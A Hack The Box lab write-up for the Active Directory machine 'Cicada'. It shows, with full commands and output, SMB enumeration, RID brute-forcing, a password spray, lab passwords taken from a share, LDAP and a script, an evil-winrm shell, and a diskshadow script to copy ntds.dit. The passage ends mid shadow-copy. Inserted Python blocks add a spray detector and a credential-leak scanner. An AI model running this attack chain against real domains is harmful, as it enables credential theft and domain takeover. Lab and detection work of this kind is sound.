Hack The Box - Cicada

June 07, 2025

Cicada

Cicada is a Windows machine running Active Directory with an open SMB share that contains a default password. Usernames can be enumerated by brute-forcing RIDs, which can then be used to run a password spray, resulting in valid credentials for the user michael.wrightson. This allows for authentication to the LDAP server to obtain AD info, leading to the discovery of another password stored in the description field of the david.orelious user. These credentials grant access to the DEV SMB share, which contains a PowerShell script that reveals the password for the emily.oscars user, a member of Backup Operators. Membership in this group can be leveraged to create a shadow copy of the C drive, providing access to the ntds.dit database and SYSTEM registry hive. These can then be used to extract user NTLM hashes, resulting in a shell as the administrator.

nmap scan:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ nmap -sC -sV -Pn -oA nmap/output 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-05 12:46 EDT
Nmap scan report for 10.10.11.35
Host is up (0.045s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-05 22:05:19Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 5h19m06s
| smb2-time: 
|   date: 2025-06-05T22:06:09
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.60 seconds

I added cicada.htb and CICADA-DC.cicada.htb to /etc/hosts. Guest access was enabled on SMB, and the HR share was readable:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'a' -p '' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV
SMB         10.10.11.35     445    CICADA-DC        HR              READ
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.10.11.35     445    CICADA-DC        SYSVOL                          Logon server share

I used netexec to spider the shares:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'a' -p '' -M spider_plus                      
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV                             
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.10.11.35     445    CICADA-DC        SYSVOL                          Logon server share
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Readable Shares:  2 (HR, IPC$)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Total folders found:  0
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Total files found:    1
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size average:    1.24 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size min:        1.24 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size max:        1.24 KB

The HR share contained the following:

{
    "HR": {
        "Notice from HR.txt": {
            "atime_epoch": "2024-08-28 13:31:48",
            "ctime_epoch": "2024-03-14 08:29:03",
            "mtime_epoch": "2024-08-28 13:31:48",
            "size": "1.24 KB"
        }
    }
}

I added -o download_flag=true to the above netexec command to download the share.

Notice from HR.txt revealed a default password used for new hires:

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

The guest session was not permitted to enumerate users with netexec's --users option; the command returned no accounts:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'a' -p '' --users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)

However, I was able to enumerate usernames by using the --rid-brute option, which iterates through possible RID values appended to the domain SID; this process identifies valid SIDs and reveals their corresponding account names:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'a' -p '' --rid-brute
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

Based on the SidTypeUser accounts from the output, I created a list of usernames:

john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

I used netexec to run a password spray, which resulted in a valid password for michael.wrightson:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
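From the defender's side, the spray above leaves a distinctive trace: one source address, several accounts, one or two failures each, all within a couple of seconds, and a single success in the middle. The following detector is an added example (not part of the writeup); it runs over constructed logon events shaped like Windows Security 4625/4624 records and separates that pattern from a user mistyping their own password.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed logon events in the shape of Windows Security 4625 (failure) and
# 4624 (success): (timestamp, event id, account, source address, NTSTATUS).
EVENTS = [
    ("2025-06-05 22:10:01", 4625, "john.smoulder",     "10.10.14.7", "0xC000006D"),
    ("2025-06-05 22:10:01", 4625, "sarah.dantelia",    "10.10.14.7", "0xC000006D"),
    ("2025-06-05 22:10:02", 4624, "michael.wrightson", "10.10.14.7", "0x0"),
    ("2025-06-05 22:10:02", 4625, "david.orelious",    "10.10.14.7", "0xC000006D"),
    ("2025-06-05 22:10:02", 4625, "emily.oscars",      "10.10.14.7", "0xC000006D"),
    # Benign noise: one person mistyping their own password from a workstation.
    ("2025-06-05 22:30:15", 4625, "sarah.dantelia",    "10.10.20.5", "0xC000006D"),
    ("2025-06-05 22:30:40", 4625, "sarah.dantelia",    "10.10.20.5", "0xC000006D"),
    ("2025-06-05 22:31:02", 4624, "sarah.dantelia",    "10.10.20.5", "0x0"),
]


def parse(events):
    """Convert the timestamp strings so the records sort and subtract cleanly."""
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), eid, user, ip, status)
            for ts, eid, user, ip, status in events]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=3):
    """Return {source_ip: alert} for every source whose failed logons cover at
    least min_accounts distinct accounts inside a sliding window. A spray is the
    inverse of a brute force: few attempts per account, many accounts per source."""
    by_ip = defaultdict(list)
    for ts, eid, user, ip, status in parse(events):
        by_ip[ip].append((ts, eid, user, status))
    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort()
        failures = [(ts, user) for ts, eid, user, _ in recs if eid == 4625]
        best, lo = None, 0
        for hi in range(len(failures)):
            while failures[hi][0] - failures[lo][0] > window:   # shrink from the left
                lo += 1
            accounts = {user for _, user in failures[lo:hi + 1]}
            if len(accounts) >= min_accounts and (best is None or len(accounts) > len(best[0])):
                best = (accounts, failures[lo][0], failures[hi][0])
        if best is None:
            continue
        accounts, first, last = best
        # A success from the same source inside the spray window is the
        # account that accepted the sprayed password (michael.wrightson above).
        successes = {user for ts, eid, user, _ in recs
                     if eid == 4624 and first <= ts <= last + window}
        alerts[ip] = {"accounts": accounts, "first": first, "last": last,
                      "successes": successes, "attempts": len(failures)}
    return alerts


if __name__ == "__main__":
    for ip, a in detect_spray(EVENTS).items():
        print(f"{ip}: {len(a['accounts'])} accounts in {a['last'] - a['first']}, "
              f"succeeded for {sorted(a['successes']) or 'nobody'}")
```

The workstation source never alerts because its failures all belong to one account, which is the signal an account-lockout policy already covers; the spray is only visible when events are grouped by source rather than by account.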

With valid user credentials, I was able to authenticate to LDAP to get domain info with ldapsearch:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ ldapsearch -x -H ldap://10.10.11.35 -D "michael.wrightson@cicada.htb" -w 'Cicada$M6Corpb*@Lp#nZp!8' -b "dc=cicada,dc=htb" > ldap_output

After looking through the output, I found a password in the description field of the david.orelious user:

<...snip...>
# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
<...snip...>

These credentials provided access to the DEV share:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ
SMB         10.10.11.35     445    CICADA-DC        HR              READ
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share

I used netexec to spider the shares:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -M spider_plus
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ
SMB         10.10.11.35     445    CICADA-DC        HR              READ
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Readable Shares:  5 (DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Total folders found:  33
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Total files found:    12
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size average:    1.09 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size min:        23 B
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size max:        5.22 KB

The DEV share contained the following:

{
    "DEV": {
        "Backup_script.ps1": {
            "atime_epoch": "2024-08-28 13:28:22",
            "ctime_epoch": "2024-03-14 08:31:38",
            "mtime_epoch": "2024-08-28 13:28:22",
            "size": "601 B"
        }
    },
<...snip...>

I downloaded the share by adding -o download_flag=true to the above netexec command.

Backup_script.ps1 revealed the credentials for emily.oscars:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
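Both credential leaks on this box, the password in david.orelious's description attribute and the plaintext password in Backup_script.ps1, are the kind of thing a periodic audit catches before an intruder does. The script below is an added example, not part of the writeup: it parses ldapsearch-style LDIF and flags descriptions that mention a password, and scans PowerShell for a literal handed to ConvertTo-SecureString -AsPlainText. The LDIF and script samples are constructed to mirror what the writeup found.

```python
import re

# Constructed LDIF in the shape ldapsearch prints: one "attr: value" per line,
# entries separated by a blank line, folded continuations starting with a space.
SAMPLE_LDIF = """\
# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: user
cn: David Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3

dn: CN=Emily Oscars,CN=Users,DC=cicada,DC=htb
objectClass: user
cn: Emily Oscars
description: Dev Support team

dn: CN=Svc Backup,CN=Users,DC=cicada,DC=htb
objectClass: user
cn: Svc Backup
description: temporary pwd: Winter2024! (constructed sample,
  rotate after first logon)
"""

# Constructed PowerShell with the same weakness as Backup_script.ps1, plus one
# line that does it right by prompting at runtime instead of embedding a secret.
SAMPLE_PS1 = '''\
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$safe = Get-Credential -UserName $username -Message "Backup account"
'''

# Words that usually precede a secret in a free-text attribute.
PASSWORD_HINT = re.compile(r"\b(pass(word)?|passwd|pwd|credential)s?\b", re.I)
# A string literal handed to ConvertTo-SecureString as plain text.
PS_PLAINTEXT = re.compile(r'ConvertTo-SecureString\s+"([^"]*)"\s+-AsPlainText', re.I)


def parse_ldif(text):
    """Return one {attribute: [values]} dict per LDIF entry."""
    entries, current, last_attr = [], {}, None
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if not raw.strip():
            if current:
                entries.append(current)
            current, last_attr = {}, None
            continue
        if raw.startswith(" ") and last_attr:        # folded continuation line
            current[last_attr][-1] += raw[1:]
            continue
        attr, _, value = raw.partition(":")
        current.setdefault(attr, []).append(value.lstrip())
        last_attr = attr
    if current:
        entries.append(current)
    return entries


def find_description_secrets(ldif_text):
    """(dn, description) for every entry whose description hints at a password."""
    hits = []
    for entry in parse_ldif(ldif_text):
        for desc in entry.get("description", []):
            if PASSWORD_HINT.search(desc):
                hits.append((entry["dn"][0], desc))
    return hits


def find_script_secrets(script_text):
    """(line number, literal) for each plaintext secret a script converts to a SecureString."""
    return [(no, m.group(1))
            for no, line in enumerate(script_text.splitlines(), 1)
            if (m := PS_PLAINTEXT.search(line))]


if __name__ == "__main__":
    for dn, desc in find_description_secrets(SAMPLE_LDIF):
        print(f"[LDAP] {dn}: {desc}")
    for no, literal in find_script_secrets(SAMPLE_PS1):
        print(f"[PS1] line {no}: plaintext secret {literal!r}")
```

Description attributes are readable by every authenticated domain user by default, which is why a password placed there is effectively shared with the whole domain; the same applies to a script on a share that any domain user can read.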

Using evil-winrm, I obtained a shell as emily.oscars:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> ls

    Directory: C:\Users\emily.oscars.CICADA\desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          6/5/2025   4:22 PM             34 user.txt

This user was a member of Backup Operators:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Members of the Backup Operators group are granted the SeBackup and SeRestore privileges:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Users with SeBackupPrivilege can create a shadow copy of the entire drive and then traverse any directory, list any folder, and copy any file regardless of the explicit access rights on it. On a domain controller this is enough to obtain sensitive files such as the ntds.dit database, which the directory service keeps locked on the live volume but which can be read from the shadow copy, and the SYSTEM registry hive. Both files can then be copied to the attacking machine and the NTLM hashes extracted with impacket-secretsdump.

The diskshadow.exe utility can be used to create the shadow copy, but I couldn't enter commands into it interactively, because commands run through evil-winrm execute inside the non-interactive wsmprovhost process, shown by its session ID (SI) of 0:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> $PID
996
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
<...snip...>
   3816      29   121000     138444       1.38    996   0 wsmprovhost
<...snip...>

diskshadow.exe can also run commands from a script file, enabling non-interactive execution. I created the script (diskshadow.txt) with the following content in C:\windows\temp:

*Evil-WinRM* PS C:\windows\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
*Evil-WinRM* PS C:\windows\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\windows\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\windows\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append

Using diskshadow.exe along with diskshadow.txt, I created a shadow copy of the C drive exposed as z:

*Evil-WinRM* PS C:\windows\temp> diskshadow.exe /s c:\windows\temp\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  CICADA-DC,  6/5/2025 4:31:11 PM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {2092a9c7-6030-4242-ae48-eb9fcebe32e2} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {b49ed108-b5d4-4cb0-85b6-7f928242451d} set as environment variable.

Querying all shadow copies with the shadow copy set ID {b49ed108-b5d4-4cb0-85b6-7f928242451d}

        * Shadow copy ID = {2092a9c7-6030-4242-ae48-eb9fcebe32e2}               %temp%
                - Shadow copy set: {b49ed108-b5d4-4cb0-85b6-7f928242451d}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\]
